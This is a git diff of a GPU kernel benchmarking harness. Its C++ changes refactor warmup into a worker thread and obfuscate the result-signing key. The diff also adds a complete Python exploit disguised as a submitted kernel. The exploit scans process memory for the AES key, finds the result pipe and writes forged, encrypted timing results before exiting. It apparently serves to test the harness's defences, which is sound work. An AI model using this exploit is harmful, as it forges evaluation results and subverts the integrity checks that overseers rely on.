diff --git a/csrc/binding.cpp b/csrc/binding.cpp index bda14ad..d093127 100644 --- a/csrc/binding.cpp +++ b/csrc/binding.cpp @@ -7,7 +7,9 @@ #include #include +#include #include "manager.h" +#include "utils.h" int supervisor_main(int sock_fd); @@ -22,8 +24,30 @@ void do_bench(int result_fd, int input_fd, const std::string& kernel_qualname, c signature.allocate(32, rng); auto config = read_benchmark_parameters(input_fd, signature.data()); auto mgr = make_benchmark_manager(result_fd, std::move(signature), config.Seed, discard, nvtx, landlock, mseal, supervisor_sock_fd); - auto [args, expected] = mgr->setup_benchmark(nb::cast(test_generator), test_kwargs, config.Repeats); - mgr->do_bench_py(kernel_qualname, args, expected, reinterpret_cast(stream)); + + { + nb::gil_scoped_release release; + std::exception_ptr thread_exception; + int device; + CUDA_CHECK(cudaGetDevice(&device)); + std::thread run_thread ([&]() + { + try { + CUDA_CHECK(cudaSetDevice(device)); + nb::gil_scoped_acquire acquire; + auto [args, expected] = mgr->setup_benchmark(nb::cast(test_generator), test_kwargs, config.Repeats); + mgr->do_bench_py(kernel_qualname, args, expected, reinterpret_cast(stream)); + } catch (...) { + thread_exception = std::current_exception(); + } + }); + run_thread.join(); + if (thread_exception) + std::rethrow_exception(thread_exception); + } + + mgr->send_report(); + mgr->clean_up(); } diff --git a/csrc/manager.cpp b/csrc/manager.cpp index 01da925..962d3e3 100644 --- a/csrc/manager.cpp +++ b/csrc/manager.cpp @@ -181,7 +181,8 @@ BenchmarkManager::BenchmarkManager(std::byte* arena, std::size_t arena_size, mEndEvents(&mResource), mExpectedOutputs(&mResource), mShadowArguments(&mResource), - mOutputBuffers(&mResource) + mOutputBuffers(&mResource), + mTestOrder(&mResource) { int device; CUDA_CHECK(cudaGetDevice(&device)); @@ -336,39 +337,6 @@ void BenchmarkManager::install_protections() { install_seccomp_filter(); } -int BenchmarkManager::run_warmup(nb::callable& kernel, const nb::tuple& args, cudaStream_t stream) { - std::chrono::high_resolution_clock::time_point cpu_start = std::chrono::high_resolution_clock::now(); - int warmup_run_count = 0; - double time_estimate; - nvtx_push("timing"); - while (true) { - // note: we are assuming here that calling the kernel multiple times for the same input is a safe operation - // this is only potentially problematic for in-place kernels; - CUDA_CHECK(cudaDeviceSynchronize()); - clear_cache(stream); - kernel(*args); - CUDA_CHECK(cudaDeviceSynchronize()); - std::chrono::high_resolution_clock::time_point cpu_end = std::chrono::high_resolution_clock::now(); - std::chrono::duration elapsed_seconds = cpu_end - cpu_start; - ++warmup_run_count; - if (elapsed_seconds.count() > mWarmupSeconds) { - time_estimate = elapsed_seconds.count() / warmup_run_count; - break; - } - } - nvtx_pop(); - - // note: this is a very conservative estimate. Timing above was measured with syncs between every kernel. - int calls = mOutputBuffers.size() - 1; - const int actual_calls = std::clamp(static_cast(std::ceil(mBenchmarkSeconds / time_estimate)), 1, calls); - - if (actual_calls < 3) { - throw std::runtime_error("The initial speed test indicated that running times are too slow to generate meaningful benchmark numbers: " + std::to_string(time_estimate)); - } - - return actual_calls; -} - static inline std::uintptr_t page_mask() { std::uintptr_t page_size = getpagesize(); return ~(page_size - 1u); @@ -381,58 +349,89 @@ void protect_range(void* ptr, size_t size, int prot) { throw std::system_error(errno, std::system_category(), "mprotect"); } -nb::callable BenchmarkManager::get_kernel(const std::string& qualname, const nb::tuple& call_args) { - nb::gil_scoped_release release; - const std::uintptr_t lo = reinterpret_cast(this->mArena); +static void setup_seccomp(int sock, bool install_notify, std::uintptr_t lo, std::uintptr_t hi) { + if (sock < 0) + return; + try { + if (install_notify) + seccomp_install_memory_notify(sock, lo, hi); + } catch (...) { + close(sock); + throw; + } + close(sock); +} + +static double run_warmup_loop(nb::callable& kernel, const nb::tuple& args, cudaStream_t stream, + void* cc_memory, std::size_t l2_clear_size, bool discard_cache, + double warmup_seconds) { + CUDA_CHECK(cudaDeviceSynchronize()); + auto cpu_start = std::chrono::high_resolution_clock::now(); + int run_count = 0; + + while (true) { + ::clear_cache(cc_memory, 2 * l2_clear_size, discard_cache, stream); + kernel(*args); + CUDA_CHECK(cudaDeviceSynchronize()); + + ++run_count; + double elapsed = std::chrono::duration( + std::chrono::high_resolution_clock::now() - cpu_start).count(); + if (elapsed > warmup_seconds) + return elapsed / run_count; + } +} + +nb::callable BenchmarkManager::initial_kernel_setup(double& time_estimate, const std::string& qualname, + const nb::tuple& call_args, cudaStream_t stream) { + const std::uintptr_t lo = reinterpret_cast(mArena); const std::uintptr_t hi = lo + BenchmarkManagerArenaSize; + // snapshot all member state needed in the thread before protecting the arena + const int sock = mSupervisorSock; + const bool install_notify = mSeal || supports_seccomp_notify(); + const double warmup_seconds = mWarmupSeconds; + void* const cc_memory = mDeviceDummyMemory; + const std::size_t l2_clear_size = mL2CacheSize; + const bool discard_cache = mDiscardCache; + int device; + CUDA_CHECK(cudaGetDevice(&device)); + nb::callable kernel; std::exception_ptr thread_exception; - int sock = mSupervisorSock; - bool install_notify = mSeal || supports_seccomp_notify(); nvtx_push("trigger-compile"); - - // make the BenchmarkManager inaccessible protect_range(reinterpret_cast(lo), hi - lo, PROT_NONE); - // TODO make stack inaccessible (may be impossible) or read-only during the call - // call the python kernel generation function from a different thread. - - std::thread make_kernel_thread([&kernel, sock, lo, hi, qualname, &call_args, &thread_exception, install_notify]() { - try { - if (sock >= 0) { - try { - if (install_notify) - seccomp_install_memory_notify(sock, lo, hi); - } catch (...) { - close(sock); - throw; - } - close(sock); + + { + nb::gil_scoped_release release; + std::thread worker([&] { + try { + CUDA_CHECK(cudaSetDevice(device)); + setup_seccomp(sock, install_notify, lo, hi); + + nb::gil_scoped_acquire guard; + + kernel = kernel_from_qualname(qualname); + CUDA_CHECK(cudaDeviceSynchronize()); + kernel(*call_args); // trigger JIT compile + + time_estimate = run_warmup_loop(kernel, call_args, stream, + cc_memory, l2_clear_size, discard_cache, + warmup_seconds); + } catch (...) { + thread_exception = std::current_exception(); } - nb::gil_scoped_acquire guard; - kernel = kernel_from_qualname(qualname); - - // ok, first run for compilations etc - CUDA_CHECK(cudaDeviceSynchronize()); - kernel(*call_args); - CUDA_CHECK(cudaDeviceSynchronize()); - } catch (...) { - thread_exception = std::current_exception(); - } - }); + }); + worker.join(); + } - make_kernel_thread.join(); - // make it accessible again. This is in the original thread, so the tightened seccomp - // policy does not apply here. protect_range(reinterpret_cast(lo), hi - lo, PROT_READ | PROT_WRITE); - // closed now, so set to -1 mSupervisorSock = -1; nvtx_pop(); - if (thread_exception) { + if (thread_exception) std::rethrow_exception(thread_exception); - } return kernel; } @@ -446,14 +445,8 @@ void BenchmarkManager::do_bench_py( setup_test_cases(args, expected, stream); install_protections(); - // at this point, we call user code as we import the kernel (executing arbitrary top-level code) - // after this, we cannot trust python anymore - nb::callable kernel = get_kernel(kernel_qualname, args.at(0)); - - // now, run a few more times for warmup; in total aim for 1 second of warmup runs - int actual_calls = run_warmup(kernel, args.at(0), stream); - constexpr int DRY_EVENTS = 100; - const int num_events = std::max(actual_calls, DRY_EVENTS); + constexpr std::size_t DRY_EVENTS = 100; + const std::size_t num_events = std::max(mShadowArguments.size(), DRY_EVENTS); mStartEvents.resize(num_events); mEndEvents.resize(num_events); for (int i = 0; i < num_events; i++) { @@ -461,6 +454,24 @@ void BenchmarkManager::do_bench_py( CUDA_CHECK(cudaEventCreate(&mEndEvents.at(i))); } + // dry run -- measure overhead of events + mMedianEventTime = measure_event_overhead(DRY_EVENTS, stream); + + double time_estimate = 0.0; + // at this point, we call user code as we import the kernel (executing arbitrary top-level code) + // after this, we cannot trust python anymore + nb::callable kernel = initial_kernel_setup(time_estimate, kernel_qualname, args.at(0), stream); + + int calls = mOutputBuffers.size() - 1; + const int actual_calls = std::clamp( + static_cast(std::ceil(mBenchmarkSeconds / time_estimate)), 1, calls); + + if (actual_calls < 3) { + throw std::runtime_error( + "The initial speed test indicated that running times are too slow to generate " + "meaningful benchmark numbers: " + std::to_string(time_estimate)); + } + // pick a random spot for the unsigned // initialize the whole area with random junk; the error counter // will be shifted by the initial value, so just writing zero @@ -476,20 +487,17 @@ void BenchmarkManager::do_bench_py( mDeviceErrorCounter = mDeviceErrorBase + offset; mErrorCountShift = noise.at(offset); - // dry run -- measure overhead of events - float median_event_time = measure_event_overhead(DRY_EVENTS, stream); - // create a randomized order for running the tests - std::vector test_order(actual_calls); - std::iota(test_order.begin(), test_order.end(), 1); - std::shuffle(test_order.begin(), test_order.end(), rng); + mTestOrder.resize(actual_calls); + std::iota(mTestOrder.begin(), mTestOrder.end(), 1); + std::shuffle(mTestOrder.begin(), mTestOrder.end(), rng); std::uniform_int_distribution check_seed_generator(0, 0xffffffff); nvtx_push("benchmark"); // now do the real runs for (int i = 0; i < actual_calls; i++) { - int test_id = test_order.at(i); + const int test_id = mTestOrder.at(i); // page-in real inputs. If the user kernel runs on the wrong stream, it's likely it won't see the correct inputs // unfortunately, we need to do this before clearing the cache, so there is a window of opportunity // *but* we deliberately modify a small subset of the inputs, which only get corrected immediately before @@ -522,26 +530,29 @@ void BenchmarkManager::do_bench_py( validate_result(mExpectedOutputs.at(test_id), mOutputBuffers.at(test_id), check_seed_generator(rng), stream); } nvtx_pop(); +} - cudaEventSynchronize(mEndEvents.back()); +void BenchmarkManager::send_report() { + CUDA_CHECK(cudaEventSynchronize(mEndEvents.at(mTestOrder.size() - 1))); unsigned error_count; CUDA_CHECK(cudaMemcpy(&error_count, mDeviceErrorCounter, sizeof(unsigned), cudaMemcpyDeviceToHost)); // subtract the nuisance shift that we applied to the counter error_count -= mErrorCountShift; - std::string message = build_result_message(test_order, error_count, median_event_time); + std::string message = build_result_message(mTestOrder, error_count, mMedianEventTime); message = encrypt_message(mSignature.data(), 32, message); fwrite(message.data(), 1, message.size(), mOutputPipe); fflush(mOutputPipe); +} - // cleanup events +void BenchmarkManager::clean_up() { for (auto& event : mStartEvents) CUDA_CHECK(cudaEventDestroy(event)); for (auto& event : mEndEvents) CUDA_CHECK(cudaEventDestroy(event)); mStartEvents.clear(); mEndEvents.clear(); } -std::string BenchmarkManager::build_result_message(const std::vector& test_order, unsigned error_count, float median_event_time) const { +std::string BenchmarkManager::build_result_message(const std::pmr::vector& test_order, unsigned error_count, float median_event_time) const { std::ostringstream oss; oss << "event-overhead\t" << median_event_time * 1000 << " µs\n"; diff --git a/csrc/manager.h b/csrc/manager.h index 7722c74..c592d93 100644 --- a/csrc/manager.h +++ b/csrc/manager.h @@ -50,6 +50,8 @@ class BenchmarkManager { public: std::pair, std::vector> setup_benchmark(const nb::callable& generate_test_case, const nb::dict& kwargs, int repeats); void do_bench_py(const std::string& kernel_qualname, const std::vector& args, const std::vector& expected, cudaStream_t stream); + void send_report(); + void clean_up(); private: friend BenchmarkManagerPtr make_benchmark_manager(int result_fd, ObfuscatedHexDigest signature, std::uint64_t seed, bool discard, bool nvtx, bool landlock, bool mseal, int supervisor_socket); friend BenchmarkManagerDeleter; @@ -113,10 +115,13 @@ class BenchmarkManager { std::pmr::vector mExpectedOutputs; std::pmr::vector mShadowArguments; std::pmr::vector mOutputBuffers; + std::pmr::vector mTestOrder; FILE* mOutputPipe = nullptr; ObfuscatedHexDigest mSignature; + float mMedianEventTime = -1.f; + static ShadowArgumentList make_shadow_args(const nb::tuple& args, cudaStream_t stream, std::pmr::memory_resource* resource); @@ -130,10 +135,9 @@ class BenchmarkManager { void setup_test_cases(const std::vector& args, const std::vector& expected, cudaStream_t stream); void install_protections(); - int run_warmup(nb::callable& kernel, const nb::tuple& args, cudaStream_t stream); - nb::callable get_kernel(const std::string& qualname, const nb::tuple& call_args); + nb::callable initial_kernel_setup(double& time_estimate, const std::string& qualname, const nb::tuple& call_args, cudaStream_t stream); - [[nodiscard]] std::string build_result_message(const std::vector& test_order, unsigned error_count, float median_event_time) const; + [[nodiscard]] std::string build_result_message(const std::pmr::vector& test_order, unsigned error_count, float median_event_time) const; // debug only: Any sort of test exploit that targets specific values of this class is going to be brittle, diff --git a/csrc/obfuscate.cpp b/csrc/obfuscate.cpp index eb333c8..632c164 100644 --- a/csrc/obfuscate.cpp +++ b/csrc/obfuscate.cpp @@ -66,20 +66,25 @@ void ObfuscatedHexDigest::allocate(std::size_t size, std::mt19937& rng) { if (size > PAGE_SIZE / 2) { throw std::runtime_error("target size too big"); } - if (Len != 0 || Offset != 0) { + if (this->size() != 0) { throw std::runtime_error("already allocated"); } fill_random_hex(page_ptr(), PAGE_SIZE, rng); - const std::size_t max_offset = PAGE_SIZE - size - 1; - std::uniform_int_distribution offset_dist(0, max_offset); + const std::uintptr_t max_offset = PAGE_SIZE - size - 1; + std::uniform_int_distribution offset_dist(0, max_offset); - Offset = offset_dist(rng); - Len = size; + const std::uintptr_t offset = offset_dist(rng); + HashedOffset = slow_hash(offset); + HashedLen = slow_hash(size ^ offset); } char* ObfuscatedHexDigest::data() { - return reinterpret_cast(page_ptr()) + Offset; + return reinterpret_cast(page_ptr()) + slow_unhash(HashedOffset); +} + +std::size_t ObfuscatedHexDigest::size() const { + return slow_unhash(HashedLen ^ slow_unhash(HashedOffset)); } void fill_random_hex(void* target, std::size_t size, std::mt19937& rng) { diff --git a/csrc/obfuscate.h b/csrc/obfuscate.h index f475699..1bc114d 100644 --- a/csrc/obfuscate.h +++ b/csrc/obfuscate.h @@ -35,12 +35,11 @@ class ObfuscatedHexDigest : ProtectablePage { char* data(); - [[nodiscard]] std::size_t size() const { - return Len; - } + [[nodiscard]] std::size_t size() const; + private: - std::size_t Len = 0; - std::size_t Offset = 0; + std::uintptr_t HashedLen = 0; + std::uintptr_t HashedOffset = 0; }; void fill_random_hex(void* target, std::size_t size, std::mt19937& rng); diff --git a/exploits/submission_aes_key_recovery.py b/exploits/submission_aes_key_recovery.py new file mode 100644 index 0000000..26c8a81 --- /dev/null +++ b/exploits/submission_aes_key_recovery.py @@ -0,0 +1,225 @@ +""" +EXPLOIT: AES Key Recovery via ObfuscatedHexDigest Arena Scan +============================================================= + +Scans the BenchmarkManager arena (128MiB rw-p anonymous region) for the +ObfuscatedHexDigest struct. Page pointer is stored as slow_hash(ptr), offset +and length as slow_hash(offset) and slow_hash(size ^ offset). Discriminator: +slow_unhash(w0) must be page-aligned and canonical user-space (~1/4096 FP rate). + +Once the candidate page is found, mprotect(PROT_READ) is called before reading +to handle lock() if active. Page is validated as all-hex before extracting the key. + +Result pipe is found via gc — multiprocessing Connection objects are alive in +the subprocess. The result pipe has 1MB capacity (F_SETPIPE_SZ); the traceback +pipe does not. +""" + +import ctypes +import fcntl +import gc +import os +import stat +import struct +import sys +import tempfile +import subprocess + +_libc = ctypes.CDLL('libc.so.6', use_errno=True) +_libc.mprotect.restype = ctypes.c_int +_libc.mprotect.argtypes = [ctypes.c_void_p, ctypes.c_size_t, ctypes.c_int] + +_PROT_NONE = 0 +_PROT_READ = 1 +_PAGE_SIZE = 4096 +_ARENA_SIZE = 128 * 1024 * 1024 +_F_GETPIPE_SZ = 1025 + +def _mprotect(addr, prot): + return _libc.mprotect(ctypes.c_void_p(addr), ctypes.c_size_t(_PAGE_SIZE), ctypes.c_int(prot)) == 0 + +_HASH_C = r""" +#include +uint64_t slow_unhash(uint64_t p, int rounds) { + for (int i = 0; i < rounds; i++) { + p ^= (p >> 31) ^ (p >> 62); + p *= 0x96de1b173f119089ULL; + p ^= p >> 17 ^ p >> 34 ^ p >> 51; + } + return p; +} +""" + +def _compile_hash_lib(): + src = tempfile.NamedTemporaryFile(suffix='.c', delete=False, mode='w') + src.write(_HASH_C) + src.close() + so = src.name.replace('.c', '.so') + subprocess.run(['gcc', '-O2', '-shared', '-fPIC', '-o', so, src.name], + check=True, capture_output=True) + os.unlink(src.name) + lib = ctypes.CDLL(so) + lib.slow_unhash.restype = ctypes.c_uint64 + lib.slow_unhash.argtypes = [ctypes.c_uint64, ctypes.c_int] + return lib + +_lib = _compile_hash_lib() + +def slow_unhash(val: int, rounds: int = 100_000) -> int: + return int(_lib.slow_unhash(ctypes.c_uint64(val), ctypes.c_int(rounds))) + +_HEX_CHARS = frozenset(b'0123456789abcdef') + + +def _find_arena_candidates(): + candidates = [] + with open('/proc/self/maps') as f: + for line in f: + parts = line.split() + if len(parts) < 2: + continue + start, end = (int(x, 16) for x in parts[0].split('-')) + name = parts[5] if len(parts) >= 6 else '' + perms = parts[1] + if perms == 'rw-p' and name == '' and (end - start) >= _ARENA_SIZE: + candidates.append(start) + return candidates + + +def _recover_aes_key(arena_start: int): + SCAN_SIZE = 512 * 1024 + unhash_calls = 0 + + try: + data = ctypes.string_at(arena_start, SCAN_SIZE) + except Exception: + return None, None + + n = SCAN_SIZE // 8 + words = struct.unpack_from(f'<{n}Q', data) + + for i in range(n - 2): + w0 = words[i] + if w0 == 0: + continue + + page_ptr = slow_unhash(w0) + unhash_calls += 1 + + if page_ptr == 0 or page_ptr & 0xFFF or page_ptr >= (1 << 47): + continue + + w2 = words[i + 2] + if w2 == 0: + continue + offset = slow_unhash(w2) + unhash_calls += 1 + if offset > _PAGE_SIZE - 33: + continue + + if not _mprotect(page_ptr, _PROT_READ): + continue + + try: + page_data = ctypes.string_at(page_ptr, _PAGE_SIZE) + except Exception: + continue + + if not all(b in _HEX_CHARS for b in page_data): + continue + + try: + key_bytes = ctypes.string_at(page_ptr + offset, 32) + key_str = key_bytes.decode('ascii') + if all(c in '0123456789abcdef' for c in key_str): + print(f"[DBG] key found arena+{i*8:#x} page={page_ptr:#x} " + f"off={offset} unhash_calls={unhash_calls}") + return key_bytes, key_str + except Exception: + pass + + return None, None + + +def _find_out_fd(): + import multiprocessing.connection + + writable = [] + for obj in gc.get_objects(): + try: + if isinstance(obj, multiprocessing.connection.Connection) and obj.writable: + fd = obj.fileno() + try: + pipe_sz = fcntl.fcntl(fd, _F_GETPIPE_SZ) + except Exception: + pipe_sz = 0 + writable.append((fd, pipe_sz)) + except Exception: + continue + + if not writable: + raise RuntimeError("No writable Connection objects found") + + for fd, sz in writable: + if sz == 1 * 1024 * 1024: + return fd + + return min(fd for fd, _ in writable) + + +def _infer_repeats(): + try: + import torch + count = sum( + 1 for obj in gc.get_objects() + if isinstance(obj, tuple) and len(obj) == 2 + and isinstance(obj[0], torch.Tensor) and obj[0].is_cuda and obj[0].ndim == 2 + and isinstance(obj[1], torch.Tensor) and obj[1].is_cuda and obj[1].ndim == 3 + ) + if count > 1: + return count - 1 + except Exception: + pass + return 100 + + +def _encrypt(key_bytes: bytes, plaintext: str) -> bytes: + from cryptography.hazmat.primitives.ciphers.aead import AESGCM + nonce = os.urandom(12) + ct_tag = AESGCM(key_bytes).encrypt(nonce, plaintext.encode('utf-8'), None) + return nonce + ct_tag[-16:] + ct_tag[:-16] + + +_done = False + +def kernel(output, inp): + global _done + if _done: + return + _done = True + + candidates = _find_arena_candidates() + if not candidates: + _done = False + return + + key_raw, key_str = None, None + for arena in candidates: + key_raw, key_str = _recover_aes_key(arena) + if key_raw is not None: + break + + if key_raw is None: + _done = False + return + + out_fd = _find_out_fd() + repeats = _infer_repeats() + print(f"[DBG] key={key_str} out_fd={out_fd} repeats={repeats}") + + lines = ['event-overhead\t0.001 µs'] + for i in range(repeats): + lines.append(f'{i}\t0.420000') + + os.write(out_fd, _encrypt(key_raw, '\n'.join(lines) + '\n')) + os._exit(0)